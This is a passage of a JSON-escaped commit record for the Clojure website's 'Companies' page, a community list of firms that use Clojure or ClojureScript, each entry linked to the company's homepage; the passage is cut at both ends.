http:\/\/otto.de[Otto,opts=nofollow]\n* http:\/\/ourhub.dk[OurHub,opts=nofollow]\n* 
http:\/\/www.outpace.com\/[Outpace,opts=nofollow]\n* http:\/\/corp.outpostgames.com\/[Outpost Games,opts=nofollow]\n* http:\/\/owsy.com[Owsy,opts=nofollow]\n* https:\/\/oysterlab.ch[Oyster Lab by Alpiq,opts=nofollow]\n* http:\/\/paddleguru.com[PaddleGuru,opts=nofollow]\n* http:\/\/www.bdpanacea.com\/[Panacea Systems,opts=nofollow]\n* https:\/\/www.pandora.com\/[Pandora,opts=nofollow]\n* http:\/\/paper.li[paper.li,opts=nofollow]\n* https:\/\/www.parcelbright.com\/[ParcelBright,opts=nofollow]\n* https:\/\/partsbox.io\/[PartsBox,opts=nofollow]\n* http:\/\/www.passivsystems.com\/[PassivSystems,opts=nofollow]\n* http:\/\/path.com\/[Path,opts=nofollow]\n* http:\/\/paygarden.com[PayGarden,opts=nofollow]\n* https:\/\/paygo.com.br[PayGo,opts=nofollow]\n* https:\/\/www.payoff.com\/[Payoff,opts=nofollow]\n* http:\/\/www.pennymacusa.com[PennyMac,opts=nofollow]\n* https:\/\/pilloxa.com[Pilloxa,opts=nofollow]\n* https:\/\/pisano.co\/[Pisano,opts=nofollow]\n* https:\/\/pitch.com\/[Pitch,opts=nofollow]\n* http:\/\/www.pivotal.io\/[Pivotal Labs,opts=nofollow]\n* https:\/\/www.pkc.io\/[PKC,opts=nofollow]\n* http:\/\/www.pointslope.com[Point Slope,opts=nofollow]\n* https:\/\/pol.is\/about\/[Pol.is,opts=nofollow]\n* http:\/\/dmarc.postmarkapp.com\/[Postmark,opts=nofollow]\n* https:\/\/precursorapp.com\/[Precursor,opts=nofollow]\n* http:\/\/www.premium.nl\/[Premium Business Consultants BV,opts=nofollow]\n* http:\/\/prime.vc\/[Prime.vc,opts=nofollow]\n* http:\/\/www.print.io\/[Print.IO,opts=nofollow]\n* https:\/\/projectmaterials.com[projectmaterials.com,opts=nofollow]\n* http:\/\/projexsys.com\/[Projexsys,opts=nofollow]\n* https:\/\/www.protopie.io\/[ProtoPie,opts=nofollow]\n* https:\/\/publizr.com\/[Publizr,opts=nofollow]\n* http:\/\/puppetlabs.com\/[Puppet Labs,opts=nofollow]\n* https:\/\/www.purposefly.com\/[PurposeFly,opts=nofollow]\n* https:\/\/quartethealth.com\/[Quartet Health,opts=nofollow]\n* http:\/\/www.quintype.com\/[Quintype,opts=nofollow]\n* https:\/\/qvantel.com\/[Qvantel,opts=nofollow]\n* http:\/\/www.radiantlabs.co[Radiant Labs,opts=nofollow]\n* https:\/\/radioactive.sg[RADIOactive,opts=nofollow]\n* http:\/\/reaktor.com\/[Reaktor,opts=nofollow]\n* https:\/\/www.redhat.com\/[Red Hat,opts=nofollow]\n* https:\/\/www.redpineapplemedia.com\/[Red Pineapple Media,opts=nofollow]\n* https:\/\/www.reifyhealth.com\/[Reify Health,opts=nofollow]\n* http:\/\/rentpath.com\/[RentPath,opts=nofollow]\n* http:\/\/jbrj.gov.br\/[Rio de Janeiro Botanical Garden,opts=nofollow]\n* http:\/\/rjmetrics.com\/[RJMetrics,opts=nofollow]\n* http:\/\/www.romr.com\/[R\u014dmr,opts=nofollow]\n* http:\/\/rocketfuel.com\/[Rocket Fuel,opts=nofollow]\n* https:\/\/rokt.com\/[ROKT,opts=nofollow]\n* http:\/\/www.roomkey.com\/[Room Key,opts=nofollow]\n* http:\/\/roomstorm.com\/[Roomstorm,opts=nofollow]\n* https:\/\/www.rowdylabs.com[Rowdy Labs,opts=nofollow]\n* http:\/\/roximity.com\/[ROXIMITY,opts=nofollow]\n* https:\/\/www.rts.ch\/info[RTS,opts=nofollow]\n* http:\/\/www.salesforce.com\/[Salesforce,opts=nofollow]\n* https:\/\/www.salliemae.com\/[Sallie Mae,opts=nofollow]\n* https:\/\/www.sap.com[SAP,opts=nofollow]\n* https:\/\/www.concur.com\/[SAP Concur,opts=nofollow]\n* http:\/\/www.twitter-fu.com\/[Sapiens Sapiens,opts=nofollow]\n* https:\/\/www.schibsted.com\/[Schibsted,opts=nofollow]\n* http:\/\/www.shareablee.com\/[Shareablee,opts=nofollow]\n* https:\/\/sharetribe.com\/[Sharetribe,opts=nofollow]\n* http:\/\/shore.li\/[shore.li,opts=nofollow]\n* http:\/\/www.signafire.com[Signafire,opts=nofollow]\n* 
http:\/\/signal.uk.com\/[Signal,opts=nofollow]\n* https:\/\/www.siili.com\/[Siili Solutions,opts=nofollow]\n* http:\/\/docs.svbplatform.com\/[Silicon Valley Bank,opts=nofollow]\n* http:\/\/silverline.mobi\/[Silverline Mobile,opts=nofollow]\n* http:\/\/www.silverpond.com.au\/[Silverpond,opts=nofollow]\n* https:\/\/www.simple.com\/[Simple,opts=nofollow]\n* https:\/\/www.simply.co.za[Simply,opts=nofollow]\n* http:\/\/www.sinapsi.com\/[Sinapsi,opts=nofollow]\n* http:\/\/us.sios.com\/[SIOS Technology Corp.,opts=nofollow]\n* https:\/\/sixsq.com\/[SixSq,opts=nofollow]\n* http:\/\/smilebooth.com\/[Smilebooth,opts=nofollow]\n* http:\/\/smxemail.com\/[SMX,opts=nofollow]\n* https:\/\/socialsuperstore.com\/[Social Superstore,opts=nofollow]\n* https:\/\/www.solita.fi\/[Solita,opts=nofollow]\n* https:\/\/soundcloud.com[Soundcloud,opts=nofollow]\n* https:\/\/www.soyoulearn.com\/[SoYouLearn,opts=nofollow]\n* https:\/\/www.sparkfund.co\/[SparkFund,opts=nofollow]\n* http:\/\/www.spinney.io\/[Spinney,opts=nofollow]\n* https:\/\/www.spotify.com[Spotify,opts=nofollow]\n* https:\/\/www.squarevenue.com[SquareVenue,opts=nofollow]\n* https:\/\/exchange.staples.com\/[Staples Exchange,opts=nofollow]\n* http:\/\/www.staples-sparx.com\/[Staples Sparx,opts=nofollow]\n* https:\/\/starcity.com\/careers[Starcity,opts=nofollow]\n* https:\/\/www.stardog.com\/[Stardog,opts=nofollow]\n* https:\/\/status.im\/[Status,opts=nofollow]\n* http:\/\/status.im[Status Research & Development GmbH,opts=nofollow]\n* https:\/\/www.stitchdata.com\/[Stitch,opts=nofollow]\n* http:\/\/structureddynamics.com\/[Structured Dynamics,opts=nofollow]\n* https:\/\/www.studio71.com\/us\/[Studio71,opts=nofollow]\n* http:\/\/www.studyflow.nl[Studyflow,opts=nofollow]\n* http:\/\/about.stylitics.com\/[Stylitics,opts=nofollow]\n* https:\/\/www.suiteness.com\/contact_us[Suiteness,opts=nofollow]\n* http:\/\/www.suprematic.net\/[Suprematic,opts=nofollow]\n* https:\/\/swiftkey.com\/[SwiftKey (Microsoft),opts=nofollow]\n* http:\/\/swirrl.com\/[Swirrl,opts=nofollow]\n* https:\/\/synple.eu\/en\/index[Synple,opts=nofollow]\n* http:\/\/www.synqrinus.com\/[Synqrinus,opts=nofollow]\n* https:\/\/www.taiste.com[Taiste,opts=nofollow]\n* https:\/\/takeoff.com[Takeoff Technologies,opts=nofollow]\n* http:\/\/talentads.net\/[TalentAds,opts=nofollow]\n* http:\/\/www.tappcommerce.com\/[Tapp Commerce,opts=nofollow]\n* https:\/\/www.tcgplayer.com\/[TCGplayer,opts=nofollow]\n* http:\/\/www.technoidentity.com\/[TechnoIdentity,opts=nofollow]\n* http:\/\/www.teradata.com[Teradata,opts=nofollow]\n* http:\/\/testdouble.com\/[Test Double,opts=nofollow]\n* https:\/\/climate.com\/[The Climate Corporation,opts=nofollow]\n* http:\/\/www.thinktopic.com\/[ThinkTopic,opts=nofollow]\n* https:\/\/github.com\/thinstripe[Thinstripe,opts=nofollow]\n* http:\/\/www.thoughtworks.com\/[ThoughtWorks,opts=nofollow]\n* http:\/\/www.threatgrid.com\/[ThreatGRID (acquired by Cisco),opts=nofollow]\n* https:\/\/www.todaqfinance.com\/[TODAQ Financial,opts=nofollow]\n* http:\/\/www.tokenmill.co\/[TokenMill,opts=nofollow]\n* https:\/\/www.tool2match.nl[Tool2Match,opts=nofollow]\n* https:\/\/www.topmonks.com\/[TopMonks,opts=nofollow]\n* https:\/\/touk.pl[TouK,opts=nofollow]\n* https:\/\/toyokumo.co.jp\/[TOYOKUMO,opts=nofollow]\n* https:\/\/www.thetrainline.com\/[Trainline,opts=nofollow]\n* https:\/\/trank.no\/[T-Rank,opts=nofollow]\n* http:\/\/www.trioptima.com\/[TriOptima,opts=nofollow]\n* https:\/\/www.troywest.com\/[Troy-West,opts=nofollow]\n* https:\/\/truckerpath.com[Trucker Path,opts=nofollow]\n* 
http:\/\/www.twosigma.com\/[Two Sigma,opts=nofollow]\n* https:\/\/www.ufst.dk[Udviklings- og forenklingsstyrelsen,opts=nofollow]\n* https:\/\/unacast.com\/[Unacast,opts=nofollow]\n* http:\/\/unbounce.com\/[Unbounce,opts=nofollow]\n* https:\/\/unfold.com\/[Unfold,opts=nofollow]\n* http:\/\/www.uhn.ca\/[University Health Network,opts=nofollow]\n* http:\/\/life.uni-leipzig.de[University Leipzig - Research Centre for Civilization Diseases (LIFE),opts=nofollow]\n* https:\/\/www.uplift.com[UpLift,opts=nofollow]\n* http:\/\/www.upworthy.com\/[Upworthy,opts=nofollow]\n* https:\/\/www.urbandictionary.com[Urban Dictionary,opts=nofollow]\n* http:\/\/ustream.tv\/[Ustream,opts=nofollow]\n* http:\/\/www.uswitch.com\/[uSwitch,opts=nofollow]\n* https:\/\/vakantiediscounter.nl[VakantieDiscounter,opts=nofollow]\n* http:\/\/veltio.com.br[Veltio,opts=nofollow]\n* https:\/\/www.verypossible.com[Very,opts=nofollow]\n* https:\/\/verybigthings.com[VeryBigThings,opts=nofollow]\n* https:\/\/vetd.com[Vetd,opts=nofollow]\n* https:\/\/viasat.com\/[Viasat,opts=nofollow]\n* http:\/\/vigiglobe.com\/[Vigiglobe,opts=nofollow]\n* https:\/\/www.vilect.ai\/[Vilect,opts=nofollow]\n* https:\/\/storrito.com[Vire,opts=nofollow]\n* https:\/\/www.virool.com\/[Virool,opts=nofollow]\n* http:\/\/vitallabs.co\/[Vital Labs,opts=nofollow]\n* https:\/\/www.vodori.com[Vodori,opts=nofollow]\n* http:\/\/www.walmartlabs.com\/[Walmart Labs,opts=nofollow]\n* https:\/\/weave.fi\/[Weave,opts=nofollow]\n* http:\/\/wefarm.org[WeFarm,opts=nofollow]\n* https:\/\/weshop.co.uk[WeShop,opts=nofollow]\n* https:\/\/www.whibse.com[Whibse,opts=nofollow]\n* https:\/\/pro.whitepages.com\/[Whitepages,opts=nofollow]\n* http:\/\/wikidocs.com\/[Wikidocs (acquired by Atlassian),opts=nofollow]\n* http:\/\/wildbit.com\/[Wildbit,opts=nofollow]\n* http:\/\/wit.ai[Wit.ai (acquired by Facebook),opts=nofollow]\n* https:\/\/work.co[Work & Co,opts=nofollow]\n* https:\/\/work.co\/[work.co,opts=nofollow]\n* https:\/\/workframe.com\/[Workframe,opts=nofollow]\n* http:\/\/www.workinvoice.it\/[Workinvoice,opts=nofollow]\n* https:\/\/www.works-hub.com[WorksHub,opts=nofollow]\n* https:\/\/worldsinglesnetworks.com\/[World Singles Networks,opts=nofollow]\n* https:\/\/www.xapix.io\/[Xapix GmbH,opts=nofollow]\n* https:\/\/xcoo.jp\/[Xcoo Inc.,opts=nofollow]\n* http:\/\/xnlogic.com[XN Logic,opts=nofollow]\n* http:\/\/yellerapp.com\/[Yeller,opts=nofollow]\n* http:\/\/yetanalytics.com\/[Yet Analytics,opts=nofollow]\n* http:\/\/www.yieldbot.com[Yieldbot,opts=nofollow]\n* http:\/\/yousee.dk\/[Yousee IT Innovation Labs,opts=nofollow]\n* https:\/\/www.youview.com\/[YouView,opts=nofollow]\n* http:\/\/www.yummly.com\/[Yummly,opts=nofollow]\n* http:\/\/www.yuppiechef.com\/[Yuppiechef,opts=nofollow]\n* http:\/\/tech.zalando.com[Zalando,opts=nofollow]\n* http:\/\/www.zendesk.com[Zendesk,opts=nofollow]\n* https:\/\/www.zenfinance.com.br\/[Zen Finance,opts=nofollow]\n* https:\/\/ilovezoona.com\/[Zoona,opts=nofollow]\n","old_contents":"= Companies\nAlex Miller\n2017-03-15\n:type: community\n:toc: macro\n:icons: font\n\nBelow is a partial list of some companies using Clojure or ClojureScript. Most of this information comes from direct contacts, presentations, or other online resources. 
If you would like to be added or removed from this list, please contact __clojure@cognitect.com__ or submit a pull request to the https:\/\/github.com\/clojure\/clojure-site[site repository].\n\nAlso, check out the <<success_stories#,Clojure Success Stories>> and <<community_stories#,Community Stories>> pages!\n\n* https:\/\/1st1.dev\/[1st1.dev,opts=nofollow]\n* http:\/\/8thlight.com\/[8th Light,opts=nofollow]\n* http:\/\/www.aclaimant.com\/[aclaimant,opts=nofollow]\n* https:\/\/www.active-group.de\/[Active Group GmbH,opts=nofollow]\n* http:\/\/www.adaptly.com\/[Adaptly,opts=nofollow]\n* http:\/\/www.adgoji.com\/[AdGoji,opts=nofollow]\n* https:\/\/www.adobe.com[Adobe,opts=nofollow]\n* https:\/\/www.adstage.io\/[AdStage,opts=nofollow]\n* http:\/\/www.advanceautoparts.com\/[Advance Auto Parts,opts=nofollow]\n* http:\/\/adzerk.com\/[Adzerk,opts=nofollow]\n* http:\/\/www.againtelligent.com\/en\/[AGA,opts=nofollow]\n* https:\/\/www.onthemarket.com[AgentsMutual\/OnTheMarket,opts=nofollow]\n* http:\/\/www.airloyal.com[Airloyal,opts=nofollow]\n* https:\/\/www.ajira.tech\/[Ajira,opts=nofollow]\n* https:\/\/www.akamai.com\/[Akamai,opts=nofollow]\n* https:\/\/akvo.org[Akvo Foundation,opts=nofollow]\n* http:\/\/www.amazon.com[Amazon,opts=nofollow]\n* https:\/\/amperity.com\/[Amperity,opts=nofollow]\n* https:\/\/www.animalia.no\/[Animalia,opts=nofollow]\n* http:\/\/annadaletech.com\/[Annadale Technologies,opts=nofollow]\n* http:\/\/www.answers.com[Answers.com,opts=nofollow]\n* http:\/\/www.anywhere.com\/[Anywhere.com,opts=nofollow]\n* https:\/\/www.apexdatasolutions.net\/[Apex Data Solutions,opts=nofollow]\n* https:\/\/apple.com[Apple,opts=nofollow]\n* http:\/\/www.appsflyer.com\/[AppsFlyer,opts=nofollow]\n* http:\/\/www.appsmiths.com\/where.php[AppSmiths,opts=nofollow]\n* http:\/\/www.appsnsites.com\/[Appsnsites,opts=nofollow]\n* http:\/\/arcstudiopro.com\/[Arc Studio Pro,opts=nofollow]\n* http:\/\/ardoq.com\/[Ardoq,opts=nofollow]\n* https:\/\/atomist.com[Atomist,opts=nofollow]\n* https:\/\/attendify.com\/[Attendify,opts=nofollow]\n* https:\/\/audiencerepublic.com[Audience Republic,opts=nofollow]\n* http:\/\/auspost.com.au\/[Australia Post,opts=nofollow]\n* http:\/\/www.autheos.com\/[Autheos,opts=nofollow]\n* https:\/\/www.bandsquare.com\/[BandSquare,opts=nofollow]\n* https:\/\/teachbanzai.com\/[Banzai,opts=nofollow]\n* http:\/\/www.baresquare.com\/[baresquare,opts=nofollow]\n* https:\/\/www.barracuda.com\/[Barracuda,opts=nofollow]\n* https:\/\/www.basefex.com\/[BaseFEX,opts=nofollow]\n* http:\/\/beanstalkapp.com\/[Beanstalk,opts=nofollow]\n* http:\/\/BearyInnovative.com[Beary Innovative,opts=nofollow]\n* https:\/\/www.beopinion.com\/[BeOpinion,opts=nofollow]\n* http:\/\/bevuta.com\/[bevuta,opts=nofollow]\n* https:\/\/www.bgpworks.com[BGPworks,opts=nofollow]\n* https:\/\/billfront.com\/[BillFront,opts=nofollow]\n* https:\/\/www.bimsystems.de\/[BIMwelt Systems,opts=nofollow]\n* https:\/\/bloomventures.io[Bloom,opts=nofollow]\n* https:\/\/www.bookwell.com.au\/[BookWell,opts=nofollow]\n* https:\/\/boundlessgeo.com\/[Boundless Geo,opts=nofollow]\n* https:\/\/brainsfeed.com[Brainsfeed,opts=nofollow]\n* https:\/\/www.braintreepayments.com\/[Braintree Payments (acquired by PayPal),opts=nofollow]\n* http:\/\/www.breezeehr.com\/[Breeze EHR,opts=nofollow]\n* http:\/\/brickalloy.com\/[BrickAlloy,opts=nofollow]\n* https:\/\/www.brightin.nl\/[Brightin,opts=nofollow]\n* https:\/\/www.broadbandspeedtest.org.uk\/[BroadbandUK,opts=nofollow]\n* http:\/\/broadpeakpartners.com[BroadPeak,opts=nofollow]\n* 
https:\/\/buddy.works\/[Buddy,opts=nofollow]\n* http:\/\/bugsbio.org\/[BUGS Bioscience,opts=nofollow]\n* http:\/\/buyhappy.co\/[Buy Happy,opts=nofollow]\n* https:\/\/buzzlers.com[buzzlers.com,opts=nofollow]\n* https:\/\/www.cambioscience.com[CambioScience,opts=nofollow]\n* http:\/\/cambium.consulting\/[Cambium Consulting,opts=nofollow]\n* https:\/\/www.capitalone.com\/[Capital One,opts=nofollow]\n* https:\/\/cardforcoin.com\/[cardforcoin,opts=nofollow]\n* https:\/\/carouselapps.com\/[Carousel Apps,opts=nofollow]\n* https:\/\/www.cars.co.za\/[Cars.co.za,opts=nofollow]\n* http:\/\/carwow.co.uk\/[carwow,opts=nofollow]\n* http:\/\/www.ca.com\/[CA Technologies,opts=nofollow]\n* http:\/\/www.cellusys.com[Cellusys,opts=nofollow]\n* https:\/\/mycentriq.com\/[Centriq,opts=nofollow]\n* http:\/\/www.cenx.com\/[CENX,opts=nofollow]\n* http:\/\/www.cerner.com\/[Cerner,opts=nofollow]\n* https:\/\/cervest.earth[Cervest Ltd.,opts=nofollow]\n* http:\/\/www.consumerfinance.gov\/[CFPB (Credit Financial Protection Bureau),opts=nofollow]\n* http:\/\/chariotsolutions.com\/[Chariot Solutions,opts=nofollow]\n* http:\/\/chartbeat.com[Chartbeat,opts=nofollow]\n* http:\/\/www.cicayda.com\/[Cicayda,opts=nofollow]\n* https:\/\/circleci.com\/[CircleCI,opts=nofollow]\n* https:\/\/www.cisco.com[Cisco,opts=nofollow]\n* http:\/\/www.citi.com[Citi,opts=nofollow]\n* http:\/\/clanhr.com\/en[ClanHR,opts=nofollow]\n* https:\/\/clearcoin.co[ClearCoin,opts=nofollow]\n* http:\/\/www.climate.com\/[Climate Corp (acquired by Monsanto),opts=nofollow]\n* http:\/\/www.clockworks.io\/[Clockworks,opts=nofollow]\n* http:\/\/cloudgears.com\/[CloudGears,opts=nofollow]\n* http:\/\/www.cloudrepo.io\/[CloudRepo,opts=nofollow]\n* https:\/\/clubhouse.io\/[Clubhouse,opts=nofollow]\n* http:\/\/code54.com[Code54,opts=nofollow]\n* http:\/\/codecentric.de[codecentric,opts=nofollow]\n* http:\/\/devartcodefactory.com\/[Co(de)factory,opts=nofollow]\n* http:\/\/www.codurance.com\/[Codurance,opts=nofollow]\n* https:\/\/www.cognician.com\/[Cognician,opts=nofollow]\n* http:\/\/cognitect.com[Cognitect,opts=nofollow]\n* https:\/\/collbox.co\/[CollBox,opts=nofollow]\n* http:\/\/collectivedigitalstudio.com[Collective Digital Studio,opts=nofollow]\n* http:\/\/commonwealthrobotics.com\/[Commonwealth Robotics,opts=nofollow]\n* https:\/\/commsor.com\/[Commsor,opts=nofollow]\n* http:\/\/www.condense.com.au[Condense,opts=nofollow]\n* http:\/\/www.consumerreports.org\/cro\/index.htm[Consumer Reports,opts=nofollow]\n* http:\/\/www.create.at\/[CREATE.21st century,opts=nofollow]\n* https:\/\/www.getcrossbeam.com\/[Crossbeam,opts=nofollow]\n* https:\/\/www.crossref.org\/[Crossref,opts=nofollow]\n* https:\/\/crowd.br.com\/[CROWD,opts=nofollow]\n* https:\/\/cryptowerk.com[Cryptowerk,opts=nofollow]\n* https:\/\/curbside.com[Curbside,opts=nofollow]\n* http:\/\/www.cycloid.io[Cycloid,opts=nofollow]\n* https:\/\/www.cycognito.com[CyCognito,opts=nofollow]\n* http:\/\/www.dailymail.co.uk\/[Daily Mail MailOnline,opts=nofollow]\n* https:\/\/www.databaselabs.io\/[Database Labs,opts=nofollow]\n* http:\/\/www.datacraft.sg\/[Datacraft,opts=nofollow]\n* http:\/\/www.datasnap.io\/[DataSnap.io,opts=nofollow]\n* http:\/\/www.datomic.com\/[Datomic,opts=nofollow]\n* https:\/\/www.d-n.be\/[Debreuck Neirynck (DN),opts=nofollow]\n* https:\/\/www.deep-impact.ch[Deep Impact,opts=nofollow]\n* http:\/\/degree9.io\/[Degree9,opts=nofollow]\n* http:\/\/democracy.works\/[Democracy Works,opts=nofollow]\n* https:\/\/www.deps.co[Deps,opts=nofollow]\n* http:\/\/www.designed.ly\/[Designedly,opts=nofollow]\n* 
https:\/\/www.db.com[Deutsche Bank,opts=nofollow]\n* https:\/\/www.devatics.com\/[Devatics,opts=nofollow]\n* http:\/\/dewise.com[Dewise,opts=nofollow]\n* https:\/\/www.diagnosia.com\/[Diagnosia,opts=nofollow]\n* https:\/\/www.discendum.com[Discendum ltd,opts=nofollow]\n* https:\/\/www.dividendfinance.com[Dividend Finance,opts=nofollow]\n* https:\/\/www.docsolver.com[DocSolver,opts=nofollow]\n* https:\/\/drevidence.com\/[Doctor Evidence,opts=nofollow]\n* https:\/\/www.doctronic.de[Doctronic,opts=nofollow]\n* http:\/\/dov-e.com[DOV-E,opts=nofollow]\n* http:\/\/dploy.io\/[dploy.io,opts=nofollow]\n* https:\/\/dreamtolearn.com[Dream to Learn,opts=nofollow]\n* http:\/\/drwtrading.com[DRW Trading Group,opts=nofollow]\n* https:\/\/www.dyne.org[Dyne.org,opts=nofollow]\n* http:\/\/www.ebay.com\/[eBay,opts=nofollow]\n* http:\/\/element84.com[Element 84,opts=nofollow]\n* http:\/\/www.empear.com\/[Empear,opts=nofollow]\n* https:\/\/writeandimprove.com\/[English Language iTutoring,opts=nofollow]\n* http:\/\/enterlab.dk[Enterlab,opts=nofollow]\n* https:\/\/www.joinef.com[Entrepreneur First,opts=nofollow]\n* http:\/\/eventfabric.com\/[Event Fabric,opts=nofollow]\n* https:\/\/eventum.no[Eventum,opts=nofollow]\n* https:\/\/evolta.fi\/[Evolta,opts=nofollow]\n* https:\/\/exoscale.ch\/[Exoscale,opts=nofollow]\n* https:\/\/www.eyeota.com\/[Eyeota,opts=nofollow]\n* http:\/\/facebook.com[Facebook,opts=nofollow]\n* http:\/\/www.facjure.com\/[Facjure,opts=nofollow]\n* http:\/\/www.factual.com\/[Factual,opts=nofollow]\n* http:\/\/www.farbetter.com\/[FarBetter,opts=nofollow]\n* https:\/\/fierce.ventures[Fierce.,opts=nofollow]\n* http:\/\/www.finalist.nl\/[Finalist,opts=nofollow]\n* https:\/\/paper.li\/[Finity AI,opts=nofollow]\n* http:\/\/www.flexiana.com\/[Flexiana,opts=nofollow]\n* http:\/\/flocktory.com[Flocktory,opts=nofollow]\n* http:\/\/www.flowa.fi\/[Flowa,opts=nofollow]\n* http:\/\/www.formcept.com\/[FORMCEPT,opts=nofollow]\n* http:\/\/try.framed.io\/[Framed Data,opts=nofollow]\n* https:\/\/freshcodeit.com\/[Freshcode,opts=nofollow]\n* https:\/\/www.fullcontact.com\/[FullContact,opts=nofollow]\n* http:\/\/functionalworks.com\/[Functional Works,opts=nofollow]\n* http:\/\/fundingcircle.com[Funding Circle,opts=nofollow]\n* http:\/\/futurice.com\/[Futurice,opts=nofollow]\n* http:\/\/www.getcontented.com.au\/[GetContented,opts=nofollow]\n* http:\/\/about.getset.com\/[GetSet,opts=nofollow]\n* http:\/\/www.gocatch.com\/[GoCatch,opts=nofollow]\n* https:\/\/gofore.com\/en\/home\/[Gofore,opts=nofollow]\n* https:\/\/www.goizper.com\/[Goizper Group,opts=nofollow]\n* https:\/\/www.go-jek.com[GO-JEK,opts=nofollow]\n* https:\/\/goldfynch.com\/[GoldFynch,opts=nofollow]\n* https:\/\/goodhertz.co\/[Goodhertz,opts=nofollow]\n* http:\/\/www.goopti.com\/[GoOpti,opts=nofollow]\n* http:\/\/www.gracenote.com\/[Gracenote,opts=nofollow]\n* https:\/\/www.grammarly.com\/[Grammarly,opts=nofollow]\n* http:\/\/www.greenpowermonitor.com\/[GreenPowerMonitor,opts=nofollow]\n* http:\/\/www.groupon.com[Groupon,opts=nofollow]\n* https:\/\/guaranteedrate.com[Guaranteed Rate,opts=nofollow]\n* https:\/\/handcheque.com\/[handcheque,opts=nofollow]\n* https:\/\/www.happymoney.com[HappyMoney,opts=nofollow]\n* https:\/\/hashrocket.com\/[Hashrocket,opts=nofollow]\n* http:\/\/www.healthfinch.com\/[healthfinch,opts=nofollow]\n* https:\/\/www.health-samurai.io[HealthSamurai,opts=nofollow]\n* https:\/\/www.helpshift.com\/[Helpshift,opts=nofollow]\n* http:\/\/www.hendrickauto.com\/[Hendrick Automotive Group,opts=nofollow]\n* 
https:\/\/www.heromarketing.nl\/[Hero Marketing,opts=nofollow]\n* http:\/\/www.heroku.com[Heroku,opts=nofollow]\n* https:\/\/hexawise.com\/[Hexawise,opts=nofollow]\n* https:\/\/homescreen.is\/[#Homescreen,opts=nofollow]\n* https:\/\/www.huobi.com\/[Huobi Global,opts=nofollow]\n* http:\/\/www.ib5k.com\/[IB5k,opts=nofollow]\n* https:\/\/icm-consulting.com.au\/[ICM Consulting,opts=nofollow]\n* http:\/\/labs.ig.com\/[IG,opts=nofollow]\n* https:\/\/www.imatic.cz[Imatic,opts=nofollow]\n* https:\/\/immute.co\/[Immute,opts=nofollow]\n* https:\/\/indabamusic.com[Indaba Music,opts=nofollow]\n* http:\/\/innoq.com[InnoQ,opts=nofollow]\n* https:\/\/instadeq.com\/[instadeq,opts=nofollow]\n* http:\/\/www.intentmedia.com\/[Intent Media,opts=nofollow]\n* http:\/\/www.interware.com.mx\/[InterWare,opts=nofollow]\n* http:\/\/www.intropica.com\/[Intropica,opts=nofollow]\n* http:\/\/www.intuit.com[Intuit,opts=nofollow]\n* http:\/\/www.iplantcollaborative.org\/[iPlant Collaborative,opts=nofollow]\n* https:\/\/www.iprally.com[IPRally Technologies,opts=nofollow]\n* http:\/\/iris.tv\/[IRIS.TV,opts=nofollow]\n* https:\/\/www.jcrew.com\/[J.Crew,opts=nofollow]\n* https:\/\/jesi.io[JESI,opts=nofollow]\n* http:\/\/juxt.pro[JUXT,opts=nofollow]\n* http:\/\/www.kane-group.com\/[Kane LPI,opts=nofollow]\n* https:\/\/kasta.ua[Kasta,opts=nofollow]\n* https:\/\/kirasystems.com\/[Kira,opts=nofollow]\n* https:\/\/klarna.com[Klarna,opts=nofollow]\n* http:\/\/knowledgee.com\/[Knowledge E,opts=nofollow]\n* http:\/\/www.kodemaker.no\/[Kodemaker,opts=nofollow]\n* https:\/\/kwelia.com\/[Kwelia,opts=nofollow]\n* https:\/\/www.ladderlife.com[Ladder,opts=nofollow]\n* https:\/\/www.theladders.com\/[Ladders,opts=nofollow]\n* https:\/\/lambdawerk.com\/[LambdaWerk,opts=nofollow]\n* https:\/\/www.latacora.com\/[Latacora,opts=nofollow]\n* http:\/\/leancloud.cn[Leancloud.cn,opts=nofollow]\n* http:\/\/en.leanheat.com[Leanheat,opts=nofollow]\n* https:\/\/lemmings.io[Lemmings,opts=nofollow]\n* https:\/\/www.lemonpi.io\/[LemonPI,opts=nofollow]\n* https:\/\/www.lendup.com\/[LendUp,opts=nofollow]\n* http:\/\/levelmoney.com[Level Money,opts=nofollow]\n* http:\/\/www.lifebooker.com[Lifebooker,opts=nofollow]\n* http:\/\/liftoff.io\/[Liftoff,opts=nofollow]\n* http:\/\/lightmesh.com[LightMesh,opts=nofollow]\n* http:\/\/likely.co\/[Likely,opts=nofollow]\n* https:\/\/line.me\/[LINE,opts=nofollow]\n* https:\/\/fluent.express[LinguaTrip,opts=nofollow]\n* http:\/\/linkfluence.com[Linkfluence,opts=nofollow]\n* http:\/\/www.listora.com\/[Listora,opts=nofollow]\n* http:\/\/www.liveops.com\/[LiveOps,opts=nofollow]\n* https:\/\/www.livingsocial.com\/[LivingSocial,opts=nofollow]\n* https:\/\/www.localize.city\/[Localize.city,opts=nofollow]\n* https:\/\/locarise.com\/[Locarise,opts=nofollow]\n* http:\/\/logicsoft.co.in\/[Logic Soft Pvt. 
Ltd.,opts=nofollow]\n* http:\/\/lonocloud.com\/[LonoCloud (acquired by ViaSat),opts=nofollow]\n* https:\/\/www.loway.ch\/[Loway,opts=nofollow]\n* https:\/\/lucidit.consulting[Lucid IT Consulting LLC,opts=nofollow]\n* http:\/\/www.lumanu.com\/[Lumanu,opts=nofollow]\n* https:\/\/www.lunchboxsessions.com[LunchBox Sessions,opts=nofollow]\n* https:\/\/www.macrofex.com\/[Macrofex,opts=nofollow]\n* http:\/\/www.macrofex.com[MACROFEX LLC,opts=nofollow]\n* http:\/\/www.madriska.com\/[Madriska Inc.,opts=nofollow]\n* http:\/\/www.magnet.coop\/[Magnet,opts=nofollow]\n* http:\/\/mainstreetgenome.com\/[Main Street Genome,opts=nofollow]\n* https:\/\/www.makimo.pl\/[Makimo, opts=nofollow]\n* http:\/\/www.comidadagente.org\/[Marktbauer\/Comida da gente,opts=nofollow]\n* http:\/\/www.mastodonc.com\/[Mastodon C,opts=nofollow]\n* http:\/\/mayvenn.com[Mayvenn,opts=nofollow]\n* https:\/\/mazira.com\/[Mazira,opts=nofollow]\n* http:\/\/www.mediquest.nl\/[Mediquest,opts=nofollow]\n* http:\/\/meewee.com[MeeWee,opts=nofollow]\n* https:\/\/www.merantix.com\/[Merantix,opts=nofollow]\n* http:\/\/www.metabase.com\/[Metabase,opts=nofollow]\n* http:\/\/www.metail.com[Metail,opts=nofollow]\n* http:\/\/metosin.fi\/[Metosin,opts=nofollow]\n* http:\/\/minorodata.com\/[Minoro,opts=nofollow]\n* https:\/\/mixpanel.com\/[Mixpanel,opts=nofollow]\n* http:\/\/www.mixrad.io\/[MixRadio,opts=nofollow]\n* 